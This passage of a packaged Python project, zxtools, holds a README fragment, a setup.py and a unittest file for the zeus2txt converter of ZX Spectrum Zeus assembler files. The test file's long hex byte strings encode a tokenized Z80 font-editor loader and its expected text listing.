$ python3 -m zxtools.zeus2txt result.zeus listing.asm --include-code
.. image:: https://raw.githubusercontent.com/codeatcpp/zxtools/master/zeus2txt.jpg
NOTE: Python 3 is required to use this package, and Python 2 is not supported but you are welcome to fix it.
To view the resulting files with syntax colorization you can use special `Visual Studio Code plugin <https://marketplace.visualstudio.com/items?itemName=jia3ep.zeus-z80-asm>`_:
.. image:: https://raw.githubusercontent.com/codeatcpp/vscode-language-z80-asm/master/vscode.png
:target: https://marketplace.visualstudio.com/items?itemName=jia3ep.zeus-z80-asm
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/README.rst
|
README.rst
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import re
from os.path import join, dirname
from setuptools import setup, find_packages
with open(join(dirname(__file__), 'zxtools', '__init__.py'), 'r') as f:
version_info = re.match(r".*__version__ = '(.*?)'", f.read(), re.S).group(1)
with open('README.rst') as f:
long_readme = f.read()
dev_requires = [
'pytest>=2.8',
'coverage>=3.7.1',
]
setup(
name='zxtools',
version=version_info,
description='Tools to manipulate files from ZX Spectrum',
keywords='spectrum sinclair 48k z80 zeus zeus-asm',
long_description=long_readme,
author='Kirill V. Lyadvinsky',
author_email='mail@codeatcpp.com',
download_url='https://github.com/codeatcpp/zxtools',
url='http://www.codeatcpp.com',
license='BSD-3-Clause',
packages=find_packages(exclude=('test', 'docs')),
extras_require={
'test': dev_requires,
},
test_suite='test',
classifiers=[
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development',
'Topic :: Utilities',
],
entry_points={
'console_scripts': [
'zeus2txt = zxtools.zeus2txt:main',
'hobeta = zxtools.hobeta:main',
],
},
)
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/setup.py
|
setup.py
|
#! /usr/bin/env python
# vim: set fileencoding=utf-8 :
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Kirill V. Lyadvinsky
# http://www.codeatcpp.com
#
# Licensed under the BSD 3-Clause license.
# See LICENSE file in the project root for full license information.
#
""" zeus2txt.py tests """
import io
import os
import tempfile
import unittest
from collections import namedtuple
import logging
from zxtools import zeus2txt
class TestZeus2Txt(unittest.TestCase):
def test_args_parser(self):
with self.assertRaises(SystemExit):
zeus2txt.parse_args(("-h", "-v"))
with self.assertRaises(SystemExit):
zeus2txt.parse_args(())
temp_in_file = tempfile.mkstemp()[1]
input_file = open(temp_in_file, "w")
input_file.close()
temp_out_file = tempfile.mkstemp()[1]
try:
args = zeus2txt.parse_args(("info", temp_in_file))
self.assertEqual(args.func, zeus2txt.show_info)
args.zeus_file.close()
args = zeus2txt.parse_args(("convert",
temp_in_file, temp_out_file))
self.assertEqual(args.func, zeus2txt.convert_file)
args.zeus_file.close()
args.output_file.close()
finally:
os.remove(temp_in_file)
os.remove(temp_out_file)
@staticmethod
def prepare_convert_args(test_data, include_code=False):
test_file = io.BytesIO(test_data)
temp_output_path = tempfile.mkstemp()[1]
temp_output_file = open(temp_output_path, "w")
args = namedtuple('Args', "zeus_file output_file include_code")
parsed_args = args(test_file, temp_output_file, include_code)
return parsed_args, temp_output_path, temp_output_file
def test_undefined_token(self):
logging.basicConfig(level=logging.DEBUG)
args, temp_output_path, temp_output_file = self.prepare_convert_args(
b"\x0A\x00\x0A\x06\xFF\x2C\x34\x32\x00\xFF\xFF")
try:
zeus2txt.convert_file(args)
temp_output_file.close()
temp_output_file = open(temp_output_path, "r")
lines = temp_output_file.read().splitlines()
self.assertEqual(lines, ["00010 ,42", ""])
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_no_eof(self):
args, temp_output_path, temp_output_file = self.prepare_convert_args(
b"\x0A\x00\x0A\x06\x82\x87\x2C\x34\x32\x00")
try:
zeus2txt.convert_file(args)
temp_output_file.close()
temp_output_file = open(temp_output_path, "r")
lines = temp_output_file.read().splitlines()
self.assertEqual(lines, ["00010 ADD BC,42", ])
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_include_code(self):
args, temp_output_path, temp_output_file = self.prepare_convert_args(
b"\x0A\x00\x0A\x06\x82\x87\x2C\x34\x32\x00", True)
try:
zeus2txt.convert_file(args)
temp_output_file.close()
temp_output_file = open(temp_output_path, "r")
lines = temp_output_file.read().splitlines()
self.assertEqual(lines, ["00010 ADD BC,42"
" ; 0x000A "
"0x0A 0x06 0x82 0x87 "
"0x2C 0x34 0x32 0x00 ", ])
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_convert(self):
args, temp_output_path, temp_output_file = self.prepare_convert_args(
self.test_data)
try:
zeus2txt.convert_file(args)
temp_output_file.close()
temp_output_file = open(temp_output_path, "rb")
lines = temp_output_file.read().splitlines()
expected_lines = self.test_output.split(b"\n")
self.assertEqual(lines, expected_lines)
finally:
temp_output_file.close()
os.remove(temp_output_path)
def setUp(self):
self.test_data = (
b"\x00\x00\x3B\x20\x4C\x4F\x41\x44\x45\x52\x20\x66\x6F\x72\x20\x46"
b"\x2E\x45\x44\x49\x54\x4F\x52\x00\x00\x00\x3B\x20\x4C\x2E\x4B\x2E"
b"\x50\x72\x6F\x64\x75\x63\x74\x69\x6F\x6E\x00\x0A\x00\x0A\x06\xBF"
b"\x35\x30\x30\x30\x30\x00\x14\x00\x0A\x06\x8A\x43\x4C\x53\x00\x1E"
b"\x00\x0A\x06\x8A\x53\x48\x52\x00\x28\x00\x0A\x06\x8A\x4E\x45\x57"
b"\x53\x48\x00\x32\x00\x0A\x06\xB3\x94\x2C\x4D\x53\x47\x31\x00\x3C"
b"\x00\x0A\x06\xB3\x87\x2C\x33\x39\x00\x46\x00\x0A\x06\x8A\x23\x32"
b"\x30\x33\x43\x00\x50\x00\x0A\x06\x8A\x53\x54\x41\x4E\x44\x00\x5A"
b"\x00\x0A\x06\xB3\xA5\x2C\x32\x32\x37\x38\x34\x00\x64\x00\x0A\x06"
b"\xB3\x94\x2C\x32\x32\x37\x38\x33\x00\x6E\x00\x0A\x06\xB3\x87\x2C"
b"\x35\x31\x31\x00\x78\x00\x0A\x06\xB3\x28\xA5\x29\x2C\x30\x00\x82"
b"\x00\x0A\x06\xB7\x00\x8C\x00\x0A\x06\xB0\x4C\x4F\x41\x44\x00\x3F"
b"\x9C\x45\x4E\x44\x0A\x03\xCC\x00\x40\x9C\x43\x4C\x53\x0A\x03\xB3"
b"\xA5\x2C\x31\x36\x33\x38\x34\x00\x4A\x9C\x0A\x06\xB3\x94\x2C\x31"
b"\x36\x33\x38\x35\x00\x54\x9C\x0A\x06\xB3\x87\x2C\x36\x31\x34\x33"
b"\x00\x5E\x9C\x0A\x06\xB3\x28\xA5\x29\x2C\x30\x00\x68\x9C\x0A\x06"
b"\xB7\x00\x72\x9C\x0A\x06\xB3\xA5\x2C\x32\x32\x35\x32\x38\x00\x7C"
b"\x9C\x0A\x06\xB3\x94\x2C\x32\x32\x35\x32\x39\x00\x86\x9C\x0A\x06"
b"\xB3\x87\x2C\x37\x36\x37\x00\x90\x9C\x0A\x06\xB3\x28\xA5\x29\x2C"
b"\x37\x00\x9A\x9C\x0A\x06\xB7\x00\xA4\x9C\x0A\x06\xE3\x80\x00\xAE"
b"\x9C\xC2\x28\x32\x35\x34\x29\x2C\x80\x3A\xB3\x80\x2C\x37\x00\xAF"
b"\x9C\x0A\x06\xB3\x28\x32\x33\x36\x32\x34\x29\x2C\x80\x00\xB8\x9C"
b"\x43\x48\x4F\x50\x45\x20\xB3\x80\x2C\x32\x00\xC2\x9C\x0A\x06\x8A"
b"\x23\x31\x36\x30\x31\x00\xCC\x9C\x0A\x06\xCC\x00\xD6\x9C\x53\x48"
b"\x52\x0A\x03\xB3\xA5\x2C\x31\x35\x36\x31\x36\x00\xE0\x9C\x0A\x06"
b"\xB3\x94\x2C\x33\x30\x30\x30\x30\x00\xEA\x9C\x0A\x06\xB3\x87\x2C"
b"\x37\x36\x38\x00\xF4\x9C\x0A\x06\xB7\x00\xFE\x9C\x0A\x06\xB3\xA5"
b"\x2C\x33\x30\x30\x30\x30\x00\x08\x9D\x0A\x06\xB3\x86\x2C\x39\x36"
b"\x00\x12\x9D\x53\x48\x32\x0A\x03\xC9\x87\x00\x1C\x9D\x0A\x06\xB3"
b"\x86\x2C\x34\x00\x26\x9D\x53\x48\x33\x0A\x03\xA9\xA5\x00\x30\x9D"
b"\x0A\x06\x9C\x53\x48\x33\x00\x3A\x9D\x0A\x06\xB3\x86\x2C\x34\x00"
b"\x44\x9D\x53\x48\x34\x0A\x03\xB3\x80\x2C\x28\xA5\x29\x00\x4E\x9D"
b"\x0A\x06\xD2\x00\x58\x9D\x0A\x06\xBE\x28\xA5\x29\x00\x62\x9D\x0A"
b"\x06\xB3\x28\xA5\x29\x2C\x80\x00\x6C\x9D\x0A\x06\xA9\xA5\x00\x76"
b"\x9D\x0A\x06\x9C\x53\x48\x34\x00\x80\x9D\x0A\x06\xC8\x87\x00\x8A"
b"\x9D\x0A\x06\x9C\x53\x48\x32\x00\x94\x9D\x0A\x06\xCC\x00\x9E\x9D"
b"\x53\x54\x41\x4E\x44\x20\xB3\xA5\x2C\x31\x35\x36\x31\x36\x00\xA8"
b"\x9D\x0A\x06\x95\xA3\x00\xB2\x9D\x0A\x06\xB3\x28\x32\x33\x36\x30"
b"\x36\x29\x2C\xA5\x00\xBC\x9D\x0A\x06\xCC\x00\xC6\x9D\x4E\x45\x57"
b"\x53\x48\x20\xB3\xA5\x2C\x41\x44\x52\x53\x48\x00\xD0\x9D\x0A\x06"
b"\x95\xA3\x00\xDA\x9D\x0A\x06\xB3\x28\x32\x33\x36\x30\x36\x29\x2C"
b"\xA5\x00\xE4\x9D\x0A\x06\xCC\x00\xEE\x9D\x46\x46\x49\x4C\x45\x20"
b"\xB3\x80\x2C\x28\x32\x30\x37\x30\x38\x29\x00\xF8\x9D\x0A\x06\x8C"
b"\x30\x00\x02\x9E\x0A\x06\xB1\xE4\x2C\x4E\x46\x49\x4C\x45\x00\x0C"
b"\x9E\x0A\x06\xB3\x86\x2C\x80\x00\x16\x9E\x0A\x06\xB3\x94\x2C\x31"
b"\x38\x34\x33\x32\x00\x20\x9E\x46\x46\x32\x0A\x03\xB3\xA5\x2C\x46"
b"\x4E\x41\x4D\x45\x00\x2A\x9E\x0A\x06\xB3\x28\x50\x44\x45\x29\x2C"
b"\x94\x00\x34\x9E\x0A\x06\xB3\x28\x50\x42\x43\x29\x2C\x87\x00\x3E"
b"\x9E\x0A\x06\xB3\x86\x2C\x38\x00\x48\x9E\x46\x46\x33\x0A\x03\xB3"
b"\x80\x2C\x28\x94\x29\x00\x52\x9E\x0A\x06\x8C\x28\xA5\x29\x00\x5C"
b"\x9E\x0A\x06\xB1\xBD\x2C\x4E\x45\x58\x54\x46\x00\x66\x9E\x0A\x06"
b"\xA9\x94\x00\x70\x9E\x0A\x06\xA9\xA5\x00\x7A\x9E\x0A\x06\x9C\x46"
b"\x46\x33\x00\x84\x9E\x0A\x06\xB3\x80\x2C\x28\x94\x29\x00\x8E\x9E"
b"\x0A\x06\x8C\x36\x39\x00\x98\x9E\x0A\x06\xB1\xBD\x2C\x4E\x45\x58"
b"\x54\x46\x00\xA2\x9E\x0A\x06\xB3\xA5\x2C\x36\x00\xAC\x9E\x0A\x06"
b"\x82\xA5\x2C\x94\x00\xB6\x9E\x0A\x06\xB3\x80\x2C\x28\xA5\x29\x00"
b"\xC0\x9E\x0A\x06\xB3\x28\x53\x45\x43\x29\x2C\x80\x00\xCA\x9E\x0A"
b"\x06\xA9\xA5\x00\xD4\x9E\x0A\x06\xB3\x80\x2C\x28\xA5\x29\x00\xDE"
b"\x9E\x0A\x06\xB3\x28\x54\x52\x43\x29\x2C\x80\x00\xE8\x9E\x0A\x06"
b"\xB0\x4C\x4F\x41\x32\x00\xF2\x9E\x4E\x45\x58\x54\x46\x20\xB3\x94"
b"\x2C\x28\x50\x44\x45\x29\x00\xFC\x9E\x0A\x06\xB3\xA5\x2C\x31\x36"
b"\x00\x06\x9F\x0A\x06\x82\xA5\x2C\x94\x00\x10\x9F\x0A\x06\xA1\x94"
b"\x2C\xA5\x00\x1A\x9F\x0A\x06\xB3\x87\x2C\x28\x50\x42\x43\x29\x00"
b"\x24\x9F\x0A\x06\x9C\x46\x46\x32\x00\x2E\x9F\x4E\x46\x49\x4C\x45"
b"\x20\x8A\x4E\x45\x57\x53\x48\x00\x38\x9F\x0A\x06\xB3\x94\x2C\x4D"
b"\x53\x47\x32\x00\x42\x9F\x0A\x06\xB3\x87\x2C\x4D\x53\x47\x33\x2D"
b"\x4D\x53\x47\x32\x00\x4C\x9F\x0A\x06\x8A\x23\x32\x30\x33\x43\x00"
b"\x4D\x9F\x0A\x06\x8A\x42\x45\x45\x50\x00\x4E\x9F\x0A\x06\xB3\x94"
b"\x2C\x4D\x53\x47\x33\x00\x4F\x9F\x0A\x06\xB3\x87\x2C\x54\x52\x43"
b"\x2D\x4D\x53\x47\x33\x00\x50\x9F\x0A\x06\x8A\x23\x32\x30\x33\x43"
b"\x00\x60\x9F\x8A\x50\x41\x55\x53\x3A\x8A\x53\x54\x41\x4E\x44\x00"
b"\x6A\x9F\x0A\x06\xB0\x4C\x4F\x41\x44\x00\x74\x9F\x50\x41\x55\x53"
b"\x0A\x02\xE3\x80\x00\x7E\x9F\x0A\x06\xB3\x28\x32\x33\x35\x36\x30"
b"\x29\x2C\x80\x00\x88\x9F\x50\x41\x32\x0A\x03\xB3\x80\x2C\x28\x32"
b"\x33\x35\x36\x30\x29\x00\x92\x9F\x0A\x06\x8C\x30\x00\x9C\x9F\x0A"
b"\x06\xCC\x20\xBD\x00\xA6\x9F\x0A\x06\xB1\x50\x41\x32\x00\xB0\x9F"
b"\x42\x45\x45\x50\x0A\x02\xB3\x94\x2C\x23\x30\x31\x30\x35\x00\xBA"
b"\x9F\x0A\x06\xB3\xA5\x2C\x23\x30\x36\x36\x36\x00\xC4\x9F\x0A\x06"
b"\x8A\x23\x30\x33\x42\x35\x00\xCE\x9F\x0A\x06\xCC\x00\xD8\x9F\x4C"
b"\x4F\x41\x44\x0A\x02\xB3\xA5\x2C\x32\x32\x35\x36\x30\x00\xE2\x9F"
b"\x0A\x06\xB3\x94\x2C\x32\x32\x35\x36\x31\x00\xEC\x9F\x0A\x06\xB3"
b"\x87\x2C\x37\x33\x36\x00\xF6\x9F\x0A\x06\xB3\x28\xA5\x29\x2C\x30"
b"\x00\x00\xA0\x0A\x06\xB7\x00\x0A\xA0\x0A\x06\xB3\x87\x2C\x23\x30"
b"\x39\x30\x35\x00\x14\xA0\x0A\x06\xB3\x94\x2C\x30\x00\x1E\xA0\x0A"
b"\x06\xB3\xA5\x2C\x31\x38\x34\x33\x32\x00\x28\xA0\x0A\x06\x8A\x31"
b"\x35\x36\x33\x35\x00\x32\xA0\x0A\x06\xB0\x46\x46\x49\x4C\x45\x00"
b"\x3C\xA0\x4C\x4F\x41\x32\x0A\x02\xB3\x80\x2C\x28\x53\x45\x43\x29"
b"\x00\x46\xA0\x0A\x06\xB3\x9D\x2C\x80\x00\x50\xA0\x0A\x06\xB3\x80"
b"\x2C\x28\x54\x52\x43\x29\x00\x5A\xA0\x0A\x06\xB3\x92\x2C\x80\x00"
b"\x64\xA0\x0A\x06\xB3\x87\x2C\x23\x32\x36\x30\x35\x00\x6E\xA0\x0A"
b"\x06\xB3\xA5\x2C\x33\x30\x30\x30\x30\x00\x78\xA0\x0A\x06\x8A\x31"
b"\x35\x36\x33\x35\x00\x82\xA0\x0A\x06\xB0\x33\x31\x36\x39\x33\x00"
b"\x60\xEA\x41\x44\x52\x53\x48\x20\xA0\x33\x30\x30\x30\x30\x00\x6A"
b"\xEA\x4D\x53\x47\x31\x0A\x02\x96\x32\x32\x2C\x30\x2C\x30\x2C\x31"
b"\x37\x2C\x30\x00\x74\xEA\x0A\x06\x96\x31\x36\x2C\x37\x00\x7E\xEA"
b"\x97\x22\x46\x4F\x4E\x54\x20\x45\x44\x49\x54\x4F\x52\x20\x62\x79"
b"\x20\x4C\x79\x61\x22\x00\x88\xEA\x97\x22\x64\x76\x69\x6E\x73\x6B"
b"\x79\x20\x4B\x69\x72\x69\x6C\x6C\x22\x00\x92\xEA\x46\x4E\x41\x4D"
b"\x45\x20\x97\x22\x65\x64\x69\x74\x6F\x72\x0A\x02\x22\x00\x9C\xEA"
b"\x50\x44\x45\x0A\x03\x99\x30\x00\xA6\xEA\x50\x42\x43\x0A\x03\x99"
b"\x30\x00\xB0\xEA\x4D\x53\x47\x32\x0A\x02\x96\x32\x32\x2C\x35\x2C"
b"\x30\x2C\x31\x37\x2C\x30\x00\xBA\xEA\x96\x31\x36\x2C\x37\x2C\x31"
b"\x39\x2C\x31\x00\xC4\xEA\x97\x22\x46\x69\x6C\x65\x20\x27\x65\x64"
b"\x69\x74\x6F\x72\x0A\x02\x3C\x9D\x3E\x27\x22\x00\xCE\xEA\x97\x22"
b"\x20\x6E\x6F\x74\x20\x66\x6F\x75\x6E\x64\x22\x00\xD8\xEA\x4D\x53"
b"\x47\x33\x0A\x02\x96\x32\x32\x2C\x36\x2C\x30\x2C\x31\x37\x2C\x30"
b"\x00\xDD\xEA\x0A\x06\x96\x31\x36\x2C\x37\x2C\x31\x39\x2C\x30\x00"
b"\xE2\xEA\x97\x22\x50\x52\x45\x53\x53\x20\x41\x4E\x59\x20\x4B\x45"
b"\x59\x20\x46\x4F\x52\x20\x22\x00\xEC\xEA\x97\x22\x52\x45\x4C\x4F"
b"\x41\x44\x20\x46\x49\x4C\x45\x22\x00\x00\xEB\x54\x52\x43\x0A\x03"
b"\x96\x30\x00\x0A\xEB\x53\x45\x43\x0A\x03\x96\x30\x00\x14\xEB\x45"
b"\x4E\x44\x32\x0A\x02\xBB\x00\xFF\xFF"
)
self.test_output = (
b"\x30\x30\x30\x30\x30\x20\x3B\x20\x4C\x4F\x41\x44\x45\x52\x20\x66"
b"\x6F\x72\x20\x46\x2E\x45\x44\x49\x54\x4F\x52\x0A\x30\x30\x30\x30"
b"\x30\x20\x3B\x20\x4C\x2E\x4B\x2E\x50\x72\x6F\x64\x75\x63\x74\x69"
b"\x6F\x6E\x0A\x30\x30\x30\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4F"
b"\x52\x47\x20\x35\x30\x30\x30\x30\x0A\x30\x30\x30\x32\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x43\x4C\x53\x0A\x30\x30"
b"\x30\x33\x30\x20\x20\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x53"
b"\x48\x52\x0A\x30\x30\x30\x34\x30\x20\x20\x20\x20\x20\x20\x20\x43"
b"\x41\x4C\x4C\x20\x4E\x45\x57\x53\x48\x0A\x30\x30\x30\x35\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x4D\x53\x47\x31"
b"\x0A\x30\x30\x30\x36\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20"
b"\x42\x43\x2C\x33\x39\x0A\x30\x30\x30\x37\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x43\x41\x4C\x4C\x20\x23\x32\x30\x33\x43\x0A\x30\x30\x30"
b"\x38\x30\x20\x20\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x53\x54"
b"\x41\x4E\x44\x0A\x30\x30\x30\x39\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x4C\x44\x20\x48\x4C\x2C\x32\x32\x37\x38\x34\x0A\x30\x30\x31\x30"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x32\x32"
b"\x37\x38\x33\x0A\x30\x30\x31\x31\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x4C\x44\x20\x42\x43\x2C\x35\x31\x31\x0A\x30\x30\x31\x32\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x48\x4C\x29\x2C\x30\x0A"
b"\x30\x30\x31\x33\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x49\x52"
b"\x0A\x30\x30\x31\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4A\x50\x20"
b"\x4C\x4F\x41\x44\x0A\x33\x39\x39\x39\x39\x20\x45\x4E\x44\x20\x20"
b"\x20\x52\x45\x54\x0A\x34\x30\x30\x30\x30\x20\x43\x4C\x53\x20\x20"
b"\x20\x4C\x44\x20\x48\x4C\x2C\x31\x36\x33\x38\x34\x0A\x34\x30\x30"
b"\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x31"
b"\x36\x33\x38\x35\x0A\x34\x30\x30\x32\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x4C\x44\x20\x42\x43\x2C\x36\x31\x34\x33\x0A\x34\x30\x30\x33"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x48\x4C\x29\x2C"
b"\x30\x0A\x34\x30\x30\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44"
b"\x49\x52\x0A\x34\x30\x30\x35\x30\x20\x20\x20\x20\x20\x20\x20\x4C"
b"\x44\x20\x48\x4C\x2C\x32\x32\x35\x32\x38\x0A\x34\x30\x30\x36\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x32\x32\x35"
b"\x32\x39\x0A\x34\x30\x30\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C"
b"\x44\x20\x42\x43\x2C\x37\x36\x37\x0A\x34\x30\x30\x38\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x48\x4C\x29\x2C\x37\x0A\x34"
b"\x30\x30\x39\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x49\x52\x0A"
b"\x34\x30\x31\x30\x30\x20\x20\x20\x20\x20\x20\x20\x58\x4F\x52\x20"
b"\x41\x0A\x34\x30\x31\x31\x30\x20\x4F\x55\x54\x20\x28\x32\x35\x34"
b"\x29\x2C\x41\x3A\x4C\x44\x20\x41\x2C\x37\x0A\x34\x30\x31\x31\x31"
b"\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x32\x33\x36\x32\x34"
b"\x29\x2C\x41\x0A\x34\x30\x31\x32\x30\x20\x43\x48\x4F\x50\x45\x20"
b"\x4C\x44\x20\x41\x2C\x32\x0A\x34\x30\x31\x33\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x43\x41\x4C\x4C\x20\x23\x31\x36\x30\x31\x0A\x34\x30"
b"\x31\x34\x30\x20\x20\x20\x20\x20\x20\x20\x52\x45\x54\x0A\x34\x30"
b"\x31\x35\x30\x20\x53\x48\x52\x20\x20\x20\x4C\x44\x20\x48\x4C\x2C"
b"\x31\x35\x36\x31\x36\x0A\x34\x30\x31\x36\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x4C\x44\x20\x44\x45\x2C\x33\x30\x30\x30\x30\x0A\x34\x30"
b"\x31\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x43\x2C"
b"\x37\x36\x38\x0A\x34\x30\x31\x38\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x4C\x44\x49\x52\x0A\x34\x30\x31\x39\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x4C\x44\x20\x48\x4C\x2C\x33\x30\x30\x30\x30\x0A\x34\x30\x32"
b"\x30\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x2C\x39\x36"
b"\x0A\x34\x30\x32\x31\x30\x20\x53\x48\x32\x20\x20\x20\x50\x55\x53"
b"\x48\x20\x42\x43\x0A\x34\x30\x32\x32\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x4C\x44\x20\x42\x2C\x34\x0A\x34\x30\x32\x33\x30\x20\x53\x48"
b"\x33\x20\x20\x20\x49\x4E\x43\x20\x48\x4C\x0A\x34\x30\x32\x34\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x44\x4A\x4E\x5A\x20\x53\x48\x33\x0A"
b"\x34\x30\x32\x35\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42"
b"\x2C\x34\x0A\x34\x30\x32\x36\x30\x20\x53\x48\x34\x20\x20\x20\x4C"
b"\x44\x20\x41\x2C\x28\x48\x4C\x29\x0A\x34\x30\x32\x37\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x52\x4C\x43\x41\x0A\x34\x30\x32\x38\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4F\x52\x20\x28\x48\x4C\x29\x0A\x34\x30"
b"\x32\x39\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x48\x4C"
b"\x29\x2C\x41\x0A\x34\x30\x33\x30\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x49\x4E\x43\x20\x48\x4C\x0A\x34\x30\x33\x31\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x44\x4A\x4E\x5A\x20\x53\x48\x34\x0A\x34\x30\x33\x32"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x50\x4F\x50\x20\x42\x43\x0A\x34"
b"\x30\x33\x33\x30\x20\x20\x20\x20\x20\x20\x20\x44\x4A\x4E\x5A\x20"
b"\x53\x48\x32\x0A\x34\x30\x33\x34\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x52\x45\x54\x0A\x34\x30\x33\x35\x30\x20\x53\x54\x41\x4E\x44\x20"
b"\x4C\x44\x20\x48\x4C\x2C\x31\x35\x36\x31\x36\x0A\x34\x30\x33\x36"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x44\x45\x43\x20\x48\x0A\x34\x30"
b"\x33\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x32\x33"
b"\x36\x30\x36\x29\x2C\x48\x4C\x0A\x34\x30\x33\x38\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x52\x45\x54\x0A\x34\x30\x33\x39\x30\x20\x4E\x45"
b"\x57\x53\x48\x20\x4C\x44\x20\x48\x4C\x2C\x41\x44\x52\x53\x48\x0A"
b"\x34\x30\x34\x30\x30\x20\x20\x20\x20\x20\x20\x20\x44\x45\x43\x20"
b"\x48\x0A\x34\x30\x34\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44"
b"\x20\x28\x32\x33\x36\x30\x36\x29\x2C\x48\x4C\x0A\x34\x30\x34\x32"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x52\x45\x54\x0A\x34\x30\x34\x33"
b"\x30\x20\x46\x46\x49\x4C\x45\x20\x4C\x44\x20\x41\x2C\x28\x32\x30"
b"\x37\x30\x38\x29\x0A\x34\x30\x34\x34\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x43\x50\x20\x30\x0A\x34\x30\x34\x35\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x4A\x52\x20\x5A\x2C\x4E\x46\x49\x4C\x45\x0A\x34\x30\x34"
b"\x36\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x2C\x41\x0A"
b"\x34\x30\x34\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44"
b"\x45\x2C\x31\x38\x34\x33\x32\x0A\x34\x30\x34\x38\x30\x20\x46\x46"
b"\x32\x20\x20\x20\x4C\x44\x20\x48\x4C\x2C\x46\x4E\x41\x4D\x45\x0A"
b"\x34\x30\x34\x39\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28"
b"\x50\x44\x45\x29\x2C\x44\x45\x0A\x34\x30\x35\x30\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x4C\x44\x20\x28\x50\x42\x43\x29\x2C\x42\x43\x0A"
b"\x34\x30\x35\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42"
b"\x2C\x38\x0A\x34\x30\x35\x32\x30\x20\x46\x46\x33\x20\x20\x20\x4C"
b"\x44\x20\x41\x2C\x28\x44\x45\x29\x0A\x34\x30\x35\x33\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x43\x50\x20\x28\x48\x4C\x29\x0A\x34\x30\x35"
b"\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4A\x52\x20\x4E\x5A\x2C\x4E"
b"\x45\x58\x54\x46\x0A\x34\x30\x35\x35\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x49\x4E\x43\x20\x44\x45\x0A\x34\x30\x35\x36\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x49\x4E\x43\x20\x48\x4C\x0A\x34\x30\x35\x37\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x44\x4A\x4E\x5A\x20\x46\x46\x33\x0A"
b"\x34\x30\x35\x38\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x41"
b"\x2C\x28\x44\x45\x29\x0A\x34\x30\x35\x39\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x43\x50\x20\x36\x39\x0A\x34\x30\x36\x30\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x4A\x52\x20\x4E\x5A\x2C\x4E\x45\x58\x54\x46\x0A"
b"\x34\x30\x36\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x48"
b"\x4C\x2C\x36\x0A\x34\x30\x36\x32\x30\x20\x20\x20\x20\x20\x20\x20"
